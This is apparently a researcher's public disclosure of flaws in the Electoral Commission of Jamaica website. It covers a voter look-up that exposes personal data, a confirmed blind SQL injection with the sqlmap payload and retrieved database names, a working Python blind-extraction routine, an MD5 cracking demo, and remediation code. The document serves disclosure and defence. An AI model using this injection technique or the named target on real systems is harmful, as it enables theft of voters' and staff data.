Disclaimer: This article was written as a result of my security research findings and is meant to inform the public of how their information is handled and of the cyber security surrounding the Electoral Commission of Jamaica (ECJ) system. Hacking is a computer crime! The author does not encourage illegal hacking and is not responsible for any trouble you might run into as a result of illegal hacks. The author has an obligation to responsibly disclose vulnerabilities to the public, hence the findings and demonstrations. The author hopes that, as a result of publishing these findings, ECJ will be pushed to fix the issues, as the findings reported to the Jamaica Cyber Incident Response Team in August 2016 were not addressed.

In the last few years, we have seen an increase in the number of cyber attacks. For those who are not familiar with the term, a cyber attack can be defined as “an attempt by hackers to damage or destroy a computer network or system.” Many countries have taken steps to protect their networks and infrastructure through cybersecurity. In fact, cyber attack is the new way of war. Wars are no longer fought with just guns; they are now also conducted through computers, in what is known as cyber war.

Millions of devices are connected to the Internet, carrying data such as bank accounts, bill payments, medical information, intellectual property, stock market data and other sensitive information. Given the nature of that data, encryption is implemented: it makes the data look like scrambled text so that an attacker who intercepts it cannot read your personal information. Encryption only protects data in transit or at rest, however; it does nothing against a flaw in the application that is itself authorised to read the data. Hackers are constantly looking for “weaknesses” in systems, design flaws and the like. With that being said, EVERYONE is a target; no country nor individual is exempt.

Last semester, while taking a course entitled “Engineering Secure Software” at Rochester Institute of Technology, I decided to apply what I had learned in a real-world environment in the form of research. “What is better than examining the cybersecurity strength of my own country, Jamaica?”, I thought to myself. With that in mind, I decided to focus on a “target” that would have a big impact if it were to be “attacked”, and picked the Electoral Commission of Jamaica (ECJ) website. ECJ holds data such as election results, voter information, employee information and other sensitive material. Prior to proceeding with my research, I established the following guidelines:

The system will not be defaced or broken in any way, nor prevented from providing services to its users.

Any sensitive data discovered during the research will be respected and will not be made available to the public.

The database will not be modified in any way.

The system will remain unmodified.

No malicious scripts will be uploaded to the server.

The vulnerabilities will be disclosed to the public only after the authorised parties have been informed and given a specific time frame to fix them.

During my research, vulnerabilities were indeed found on the ECJ website, both design and programming flaws. First I will discuss the design flaw. On the ECJ website, voters can check whether they are on the voters list by visiting the link http://www.ecj.com.jm/content-57-146.htm . The page loads the following image:

One may be tempted to think this is an innocent thing. On the contrary, this is a huge design flaw, because ANYONE can look up anyone. I dare say 95% of the information we need is openly available on the Internet. A quick Facebook search for the person we want to check will tell us their birthday and full name. Upon entering the required fields, the user then has access to the person’s home address, occupation and full name including middle name, and other information the person may otherwise want to keep private. For the sake of argument, let us say we want to know whether Prime Minister Andrew Holness is on the voters list… Exactly: we all know his last name, first name and birthday, or chances are they are available online. After a quick Google search on his name, we can access his entry on the voters list. While some may argue that this does not do much harm to an individual, it is not so; it can do a lot of damage. As we all know, Jamaica and America are on a different level when it comes to politics and voting. Although a democratic country, most Jamaicans fear for their lives during elections. Some neighbourhoods are “don” controlled, yes! Even the “don” can perform a simple look-up and know every person in the community who is eligible to vote, and force them to vote for a certain party. The root of the problem is that the form is keyed on information that is not secret: a look-up that gates personal data should require something only the voter holds, answer only whether the person is on the list rather than echoing the address back, and be rate-limited so that it cannot be used to walk through a whole community.

In order to see whether ECJ is vulnerable to different types of attack, two tools were used: sqlmap and uniscan. First, uniscan:

sudo uniscan -u http:

This lets us check all links on the page and directory listings, as well as test for SQL injection and other attacks. It was discovered that blind SQL injection is possible on the domain by manipulating the URL to:

http:

Seeing this type of result, one can reasonably conclude that the value of spid is concatenated straight into the SQL query instead of being bound as a parameter of a prepared statement (PDO or mysqli), which is what actually prevents SQL injection (the legacy mysql_ extension has no prepared-statement support, which is one reason it was deprecated). In addition, the input is obviously not filtered or validated. A safe action would have been:

if (isset($_GET['spid'])) {
    $spid = filter_var($_GET['spid'], FILTER_VALIDATE_INT);          // spid is a numeric id: reject anything else
    if ($spid === false) { http_response_code(400); exit; }
    $stmt = $pdo->prepare('SELECT * FROM pages WHERE spid = :spid');  // $pdo and the table name are placeholders
    $stmt->execute([':spid' => $spid]);                               // bound as a value, never concatenated
}

Depending on what the parameter is meant to carry, the validation of $_GET['spid'] can be tightened further, for example with a whitelist of expected values or a length limit. htmlentities() and htmlspecialchars() have their place too, but at output time, when a value is written into HTML, to prevent cross-site scripting; they do not make a SQL query built by string concatenation safe. A database should NEVER execute a query assembled from unvalidated input; values must be bound as parameters. We will now run sqlmap to make sure the vulnerability reported by uniscan is not a false positive.

- . . . . -- --

This analyses the database through the potential SQL injection link we found. --banner asks sqlmap to retrieve the DBMS banner (the server's version string) once an injection is confirmed, and --batch makes it run without prompting, taking the default answer to every question.

At first we saw the message “[WARNING] heuristic (basic) test shows that GET parameter 'spid' might not be injectable”. However, after it finished all its tests we were presented with “GET parameter 'spid' is vulnerable.” According to sqlmap, the payload that confirms the injection is:

Parameter: spid (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: spid=(SELECT (CASE WHEN (2354=2354) THEN 2354 ELSE 2354*(SELECT 2354 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
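The payload works like this: when the WHEN condition holds, the CASE evaluates to 2354 and the page renders normally; when it does not, MySQL evaluates the ELSE branch, whose subquery against INFORMATION_SCHEMA.CHARACTER_SETS returns more than one row, the query errors and the page changes. That one-bit difference is the whole attack. The following is an added example of mine, not ECJ's or sqlmap's code: it reproduces the technique against a constructed SQLite database with a look-up that concatenates spid into its query, the parameter-bound version that is immune, and an extraction loop that pulls a value out of another table using only true/false answers, which is what sqlmap automates when it lists databases and dumps tables. SQLite has no INFORMATION_SCHEMA and does not error on a multi-row scalar subquery, so the oracle here uses the simpler `146 AND (condition)` form; the table and column names (pages, users, spid, pw_hash) and the rows are assumptions for the demo.

```python
"""Boolean-based blind SQL injection against a deliberately vulnerable
look-up on an in-memory SQLite database. Added example, not ECJ's code:
the tables, rows and column names are constructed for the demo."""
import sqlite3


def make_db():
    """Constructed sample data: a page table keyed by spid and a users table
    holding an unsalted MD5 hash (md5('password')), as the article describes."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (spid INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT);
        INSERT INTO pages VALUES (146, 'Am I on the voters list?');
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def vulnerable_lookup(conn, spid):
    """The flaw: the raw query-string value is concatenated into the SQL text,
    so whatever the attacker sends becomes part of the statement."""
    sql = "SELECT title FROM pages WHERE spid = " + spid
    return conn.execute(sql).fetchone()


def safe_lookup(conn, spid):
    """The fix: the value is bound as a parameter. It is compared as data and
    can never change the structure of the query."""
    return conn.execute("SELECT title FROM pages WHERE spid = ?", (spid,)).fetchone()


def oracle(conn, condition):
    """One bit of information per request: does the page still render its
    normal content (a row came back) when the injected condition is ANDed in?"""
    return vulnerable_lookup(conn, f"146 AND ({condition})") is not None


def blind_extract(conn, expr, max_len=64):
    """Recover the result of any SQL expression one character at a time using
    only true/false answers. Each character costs about seven requests
    (binary search over printable ASCII)."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, f"length(({expr})) >= {pos}"):
            break  # reached the end of the string
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print("admin user:", blind_extract(db, "SELECT username FROM users LIMIT 1"))
    print("admin hash:", blind_extract(db, "SELECT pw_hash FROM users LIMIT 1"))
    # The same payload against the parameterised look-up finds nothing: the
    # string '146 AND (1=1)' is simply not equal to any spid.
    print("safe lookup:", safe_lookup(db, "146 AND (1=1)"))
```

Note that nothing in the extraction loop depends on error messages or on seeing query output: the attacker only ever observes whether the normal page came back, which is why the "blind" variant is just as damaging as an injection that echoes data.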

From there we can then issue a command to return the available databases:

- . . . . -- --

After the command executes, we are presented with:

[08:27:45] [INFO] retrieved: 625551_ecj
[08:28:01] [INFO] retrieved: information_schema

We can see that the most interesting database is 625551_ecj, which presumably holds ECJ's voting results, voters, employees and so on. An attacker can then continue with further sqlmap commands to get the names of tables and columns, and even passwords. Further analysis revealed that the passwords are stored as hashes… MD5 hashes. MD5 is outdated: its collision resistance is broken, and, more importantly for password storage, it is a fast, unsalted hash, so every leaked hash can be looked up in a precomputed table or brute-forced at billions of guesses per second. It should not be used to secure anything sensitive at all; passwords belong in a salted, slow hash such as bcrypt, scrypt or Argon2.
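Why an unsalted MD5 is a poor password store can be shown in a few lines. The following is an added example, not ECJ's code: the two “leaked” hashes and the word list are constructed (the hashes are MD5 of common passwords), and scrypt from the Python standard library stands in for any salted, slow password hash (bcrypt and Argon2 are equally appropriate).

```python
"""Unsalted MD5 versus a salted, slow password hash. Added example; the
leaked hashes and the word list are constructed for the demo."""
import hashlib
import hmac
import os

# Constructed sample: what a dumped users table with MD5 password hashes looks like.
LEAKED_MD5 = {
    "admin": "5f4dcc3b5aa765d61d8327deb882cf99",   # md5('password')
    "clerk": "e10adc3949ba59abbe56e057f20f883e",   # md5('123456')
}
WORDLIST = ["123456", "password", "letmein", "qwerty", "jamaica"]


def crack_md5(hashes, wordlist):
    """With no salt, one MD5 per candidate word builds a table that recovers
    every user who chose that word; the whole dump cracks in a single pass."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: table[h] for user, h in hashes.items() if h in table}


# Cost parameters: 16 MiB of memory and tens of milliseconds per guess,
# versus nanoseconds for an MD5.
SCRYPT = dict(n=2 ** 14, r=8, p=1, dklen=32)


def hash_password(password):
    """A fresh random salt per user makes precomputed tables useless and
    forces an attacker to work on one account at a time."""
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT)
    return "scrypt$" + salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    algo, salt_hex, digest_hex = stored.split("$")
    if algo != "scrypt":
        raise ValueError("unsupported hash format: " + algo)
    digest = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex), **SCRYPT)
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print("cracked from the MD5 dump:", crack_md5(LEAKED_MD5, WORDLIST))
    stored = hash_password("password")
    print("stored:", stored)
    print("same password, different hash:", hash_password("password") != stored)
    print("verify:", verify_password("password", stored), verify_password("Password", stored))
```

The stored string carries the algorithm name and the salt alongside the digest, so the scheme can be upgraded later without locking users out: a login that verifies an old-format hash can simply rehash the password with the new parameters.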

Some files in supposed 'admin' areas were found to be unprotected. An example of an admin area is http://www.ecj.com.jm/cms/ ; running a simple DirBuster scan yields the files within http://www.ecj.com.jm/cms/ , and with patience an attacker can find some that are not protected. Directory listing should be off, and steps should be taken to ensure that files in the admin area are protected by authentication enforced on the server, not merely left unlinked.

I reported my findings to the Jamaica Cyber Incident Response Team in August and, to date, there have not been any fixes. An attacker can do several kinds of damage if the issues remain unfixed, including:

stealing voter information, including home addresses, occupations and more;

manipulating the voter list;

stealing ECJ staff credentials;

manipulating voting results;

publishing sensitive material in public forums to make statements;

hacking into the database and deleting everything, or even defacing the website to make a political statement;

and many other kinds of damage!

In conclusion, Jamaica needs to take cybersecurity seriously. This should be more than just “talking” about implementing security measures and never putting them in place. Findings of security breaches, flaws or vulnerabilities should not be ignored. Government needs to take cybersecurity seriously by:

Setting an example by securing its own websites and those of its affiliates.

Encouraging ethical hacking/pentesting of the national cybersecurity defences for the sake of fixing the vulnerabilities found.

Promoting research into cybersecurity and vulnerability finding, such as bug bounty programs.

Implementing stricter regulation of how sensitive material is stored.

Holding companies responsible for failure to protect users’ information and ensuring that they adhere to OWASP standards.

Making it mandatory for companies to have a fixed window for fixing bug(s) or security breach(es) found on their websites, and then to inform the public of the vulnerability and of the fixes now in place. Companies have a responsibility to inform customers when vulnerabilities are found in their system or service platform, period.

Increasing the number of cybersecurity courses taught in local colleges/universities.

Hiring more qualified individuals for the Jamaica Cyber Incident Response Team and other cybersecurity functions.



